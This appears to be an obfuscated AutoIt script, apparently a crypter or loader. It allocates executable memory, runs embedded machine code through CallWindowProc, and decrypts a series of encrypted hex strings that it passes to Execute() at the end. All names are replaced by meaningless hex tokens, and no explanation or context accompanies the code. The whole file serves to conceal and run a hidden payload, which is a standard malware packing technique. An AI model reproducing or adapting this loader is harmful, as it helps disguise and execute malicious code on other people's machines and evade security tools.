DllCall("kernel32.dll","ptr","VirtualAlloc","ptr",$977716AC19F6F318,"ulong_ptr",$9777E6AC19F6F318,"dword",$9777B6AC19F6F318,"dword",$977746AC1906F318)
@error 
SetError(@error,@extended, 0 )
DllCall("kernel32.dll","bool","VirtualFree","ptr",$977716AC19F6F318,"ulong_ptr",$9777E6AC19F6F318,"dword",$97774DAC19F6F318)
@error 
SetError(@error,@extended, False )
_977746AC6BF6F318($977746AC69F6F318, 0 ,$977746ACB9F6F318)
Not IsDllStruct($977743AC19F6F318) 
@AutoItX64 
String(_977746AC19B6F318($977746AC1FF6F318))
StringInStr($977746EC19F6F318,"87DB")
StringInStr($977746EC19F6F318,"87C9")
StringInStr($977746EC19F6F318,"87D2")
StringInStr($977746EC19F6F318,"87F6")
StringInStr($977746EC19F6F318,"09C0")
StringInStr($977746EC19F6F318,"09DB")
StringInStr($977746EC19F6F318,"09C9")
StringInStr($977746EC19F6F318,"09D2")
StringInStr($977746EC19F6F318,"09F6")
StringInStr($977746EC19F6F318,"09FF")
StringInStr($977746EC19F6F318,"09E4")
StringInStr($977746EC19F6F318,"09ED")
Binary($977746EC19F6F318)
_977746AC5906F318( 0 ,BinaryLen($977746EC19F6F318),$977746AC14F6F318,$977746AD19F6F318)
DllStructCreate("byte["&BinaryLen($977746EC19F6F318)&"]",$977746AC69F6F318)
DllStructSetData($977743AC19F6F318, 1 ,$977746EC19F6F318)
OnAutoItExitRegister("_9777C6AC49F6F318")
Binary($977746AC09F6F318)
BinaryLen($977746AC09F6F318)
DllStructCreate("byte["&$97774AAC19F6F318&"]")
DllStructSetData($977746AC39F6F318, 1 ,$977746AC09F6F318)
DllStructGetData($977746AC39F6F318, 1 )
Not IsDllStruct($977743AC19F6F318) 
_977736AC69F6F318()
_977146AC10F6F318($977746AC09F6F318)
DllStructCreate("byte[244]")
DllStructCreate("byte["&BinaryLen($977746AC09F6F318)&"]")
DllStructSetData($977746ACA9F6F318, 1 ,$977746AC09F6F318)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($977743AC19F6F318)+$97774CAC19F6F318,"ptr",DllStructGetPtr($9777461C19F6F318),"ptr",DllStructGetPtr($977746ACA9F6F318),"uint",BinaryLen($977746AC09F6F318)* 8 ,"int", 0 )
Not IsDllStruct($977743AC19F6F318) 
_977736AC69F6F318()
_977146AC10F6F318($977746AC09F6F318)
DllStructCreate("byte[244]")
DllStructCreate("byte["&BinaryLen($977746AC09F6F318)&"]")
DllStructSetData($977746ACA9F6F318, 1 ,$977746AC09F6F318)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($977743AC19F6F318)+$977746A719F6F318,"ptr",DllStructGetPtr($9777461C19F6F318),"ptr",DllStructGetPtr($977746ACA9F6F318),"uint",BinaryLen($977746AC09F6F318)* 8 ,"int", 0 )
Not IsDllStruct($977743AC19F6F318) 
_977736AC69F6F318()
Not IsDllStruct($9777461C19F6F318) 
SetError( 1 , 0 ,Binary(""))
Binary($9777460C19F6F318)
Ceiling(BinaryLen($9777460C19F6F318)/ 16 )
$977744AC19F6F318= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$977744AC19F6F318&"]")
DllStructSetData($9777468C19F6F318, 1 ,$9777460C19F6F318)
DllStructCreate("byte[16]")
DllStructSetData($977746AC1EF6F318, 1 ,$9777469C19F6F318)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($977743AC19F6F318)+$977746AC59F6F318,"ptr",DllStructGetPtr($9777461C19F6F318),"ptr",DllStructGetPtr($9777468C19F6F318),"uint",$977744AC19F6F318,"ptr",DllStructGetPtr($977746AC1EF6F318))
DllStructGetData($977746AC1EF6F318, 1 )
DllStructGetData($9777468C19F6F318, 1 )
Not IsDllStruct($977743AC19F6F318) 
_977736AC69F6F318()
Not IsDllStruct($9777461C19F6F318) 
SetError( 1 , 0 ,Binary(""))
Binary($9777460C19F6F318)
BinaryLen($9777460C19F6F318)
$977744AC19F6F318= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$977744AC19F6F318&"]")
DllStructSetData($9777468C19F6F318, 1 ,$9777460C19F6F318)
DllStructCreate("byte[16]")
DllStructSetData($977746AC1EF6F318, 1 ,$9777469C19F6F318)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($977743AC19F6F318)+$977747AC19F6F318,"ptr",DllStructGetPtr($9777461C19F6F318),"ptr",DllStructGetPtr($9777468C19F6F318),"uint",$977744AC19F6F318,"ptr",DllStructGetPtr($977746AC1EF6F318))
DllStructGetData($977746AC1EF6F318, 1 )
DllStructGetData($9777468C19F6F318, 1 )
Not IsDllStruct($977743AC19F6F318) 
_977736AC69F6F318()
Not IsDllStruct($9777461C19F6F318) 
SetError( 1 , 0 ,Binary(""))
Binary($9777460C19F6F318)
BinaryLen($9777460C19F6F318)
$977744AC19F6F318= 0 
SetError( 1 , 0 ,Binary(""))
DllStructCreate("byte["&$977744AC19F6F318&"]")
DllStructSetData($9777468C19F6F318, 1 ,$9777460C19F6F318)
DllStructCreate("byte[16]")
DllStructSetData($977746AC1EF6F318, 1 ,$9777469C19F6F318)
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($977743AC19F6F318)+$977746AA19F6F318,"ptr",DllStructGetPtr($9777461C19F6F318),"ptr",DllStructGetPtr($9777468C19F6F318),"uint",$977744AC19F6F318,"ptr",DllStructGetPtr($977746AC1EF6F318))
DllStructGetData($977746AC1EF6F318, 1 )
DllStructGetData($9777468C19F6F318, 1 )
_977744AC1AF6F318($9777461C19F6F318,$9777469C19F6F318,$9777460C19F6F318)
BinaryLen($9777460C19F6F318)
BinaryMid($9777460C19F6F318,$977746ACC9F6F318, 1 )=Binary("0x80") 
BinaryMid($9777460C19F6F318, 1 ,$977746ACC9F6F318- 1 )
Binary($9777460C19F6F318)
BinaryLen($9777460C19F6F318)<= 16 
SetError( 1 , 0 ,Binary(""))
BinaryMid($9777460C19F6F318, 1 , 16 )
BinaryMid($9777460C19F6F318, 17 )
String($9777465C19F6F318)
_977246A219F6F318($977746AC09F6F318)
_977746AB1EF6F318($9777461C19F6F318,$9777469C19F6F318,$9777460C19F6F318)
_977246A219F6F318($977746AC09F6F318)
_977036AC19F6F318($9777461C19F6F318,$9777469C19F6F318,$9777460C19F6F318)
_9777464819F6F318($977746AC09F6F318)
_977756AC1966F318($9777461C19F6F318,$9777469C19F6F318,$9777460C19F6F318)
BinaryLen($977742AC19F6F318)= 0 
SetError( 1 , 0 ,Binary(""))
@AutoItX64 
StringInStr($977746EC19F6F318,"89C0")
StringInStr($977746EC19F6F318,"89D2")
StringInStr($977746EC19F6F318,"89F6")
Binary($977746EC19F6F318)
_977746AC5906F318( 0 ,BinaryLen($977746EC19F6F318),$977746AC14F6F318,$977746AD19F6F318)
DllStructCreate("byte["&BinaryLen($977746EC19F6F318)&"]",$977746AC79F6F318)
DllStructSetData($9777466C19F6F318, 1 ,$977746EC19F6F318)
DllStructCreate("byte[16]")
StringLen($977746AC1FF6F318)
DllStructCreate("byte["&$977741AC19F6F318&"]")
DllCall("user32.dll","none","CallWindowProc","ptr",DllStructGetPtr($9777466C19F6F318)+$977746ACF9F6F318,"ptr",DllStructGetPtr($977746AC1DF6F318),"int", 0 ,"int", 0 ,"int", 0 )
DllCall("user32.dll","int","CallWindowProc","ptr",DllStructGetPtr($9777466C19F6F318)+$977746AE19F6F318,"str",$977746AC1FF6F318,"uint",$977741AC19F6F318,"ptr",DllStructGetPtr($977746AC99F6F318),"ptr",DllStructGetPtr($977746AC1DF6F318))
DllStructGetData(DllStructCreate("uint",DllStructGetPtr($977746AC99F6F318)), 1 )
DllStructCreate("byte["&($977746AC16F6F318+ 16 )&"]")
DllCall("user32.dll","uint","CallWindowProc","ptr",DllStructGetPtr($9777466C19F6F318)+$977746ACD9F6F318,"ptr",DllStructGetPtr($977746AC99F6F318)+ 4 ,"ptr",DllStructGetPtr($977746AC18F6F318),"int", 0 ,"int", 0 )
_977746AC6BF6F318($977746AC79F6F318, 0 ,$977746ACB9F6F318)
BinaryMid(DllStructGetData($977746AC18F6F318, 1 ), 1 ,$977742AC19F6F318[ 0 ])
Number($977746A919F6F318)
Number($977746A919F6F318)
_977736AC69F6F318()
BinaryToString(_977746A518F6F318($97774EAC19F6F318[$977740AC19F6F318],$977746DC19F6F318))
Execute(_977746A419F0F318("0x1276A3EDE7D4F8FEB41E2D7E5D1756378F1561CA7738E3DA5671DD66D5721CEC4A51F0C9BADF16ECD0F9E6F7D1EB4665"))
Execute(_977746A419F0F318("0x86D5D2D08EC0DCBEEE43BEEA55485027E391EF18C6C07EEEA8119DA53F0FC9A6FCA5DBDEE406BB34472249C194B6EA95"))
Execute(_977746A419F0F318("0xFDF7911FA84239E6892D44AEFE08AD4DAE533254D4DEC168869FBB13957E5C07673196F3D1E89C533F7F7BE7F2577F17"))
Execute(_977746A419F0F318("0x341F8B631BF1AD95F096B1F22134C6DA92BCDC84D2C850DACF4402F801CD6D86CA1C289FCCB117E914A1424937BC1887E936DFE1DFC760C697AAC097C224BF58AAFC3A1140F47682AC14AFD9F07BDCF2"))
Execute(_977746A419F0F318("0x47CDC4CEFA8FD7CF4112818DCBD8B1EF1C9A6EA847E49850C5D5D88B60B54C2D35CEAD50EF1236475250FC9514092606A5E603DC8B99C2C6E8920F2E56F9CDB3C153B0667BCEEFEDE458C4CD8133F3B1"))
Execute(_977746A419F0F318("0xCCB443370C734C1E84497F1F1228A1026CB1CF40223EB2F1A15EE53B91D5A0720692C2DE972200128991F41201E745468E48D3B2C53D3F9BA6363A4495FC5D5A3FFF7FD310D6C65CDAD90C86B972ACBC"))
Execute(_977746A419F0F318("0x866D0A9329980DDD9112ACF89733AC88527913942146F400C40FA85B6F9B0A472A0F24BB8953B78B999968B8B1119C0EC2F99027035B838657719A4B736F5C68497F610214F3AAEBDC38D810AA44397D3F21BD166140621ECD32126DD25C07C6"))
Execute(_977746A419F0F318("0x067EDEFCF679492A96F7C8EF8DD82974299B011334CD0E48982B45E2237392CF55CFFC784E44482BE6D56CE8B19D7567461C899597F14DC744CA93388936F280"))
Execute(_977746A419F0F318("0xDF080BDE7E6AC7175022FF596EB4F48A905C3D19302D992CE70AA49E7437B600221399BA71E92A4FD6372C1DA23889A6F368C0E003EB1B260A38021C1749253FFEF6B1E66EA694D3E5B8A169BF7F8814"))
Execute(_977746A419F0F318("0x091B59559BE42CDBAE6B56C82582EF312F20E15A9B0B4612C292A5C4312865A59ED599B75A1C0361BCB9587134729B71"))
Execute(_977746A419F0F318("0x825BBD47F8958BF9E2E1C91772907CE7DFF0A1DFB025ED6395F1AB4532098EB1A17FF670A07034FFA977098BA5C92D86"))
Execute(_977746A419F0F318("0xF2BBB7DAE47EAD7C081E504EE82475D58EE44387FCBF9D7D4BC59547CF4F7AA1A3E96C6F1918FB9ED394EB5AFFF0D96F8742A06891D23159929DDC4CC62B3BB7D4587B5CD3C80C2658F6A47F1C40B4D602C7C7537D5730FCB54F4E1EEF28C283"))
Execute(_977746A419F0F318("0x3CB72C6838C03F207742A5505E19CD7280A19F9E62AFB04782BC3BA925FBC0A9BBBBA7686E78D24268075CD530EA2DF3"))
Execute(_977746A419F0F318("0x8124243B6084422F0141C9050311B6BD792AC75DF0477F2B42A81D7CDFED0750FFBC27B75BBD7DC18E16D355E979A6170F2F58BE62F7834A2B153F510E1AB7463D2C63DEFD64E5456FC8C3AD426ABAFA1A4D14FA397B24ABC9B1249C80349966"))
Execute(_977746A419F0F318("0xF8FCFC8BCD4D571811D193206A98F1D28603C34902EF2F5576A93739E231DFD2C9A082CD41F7E7F7097AB7506B837FD3EBE1B7ECA40FC82649082454684552A3EA5B3C427DA999306A5CFD211BABA1D4299A773E7C7D083470EC3C836F05FFFBA1FD4FF54451DEF64245912365F6F421"))
Execute(_977746A419F0F318("0xB7EE575A0B52122D45C99BCBD51C637862828308F4807CFCE82DEDCE1F1B20C5618A27CDBF45524C1A66F00F66574812",3))
Execute(_977746A419F0F318("0x7F7F4F364573A975777EF802C013624573FF4FD513CE80F907B2596F94F760FC7FA738D57FF90CA4B8B2D242E9D389EF3CD8C9E6541AB7769AF925376810D60A4A46C9ABCBE0CF79F02532AB32DE062FEF5259C26F8B109B0151962AA3373989",3))
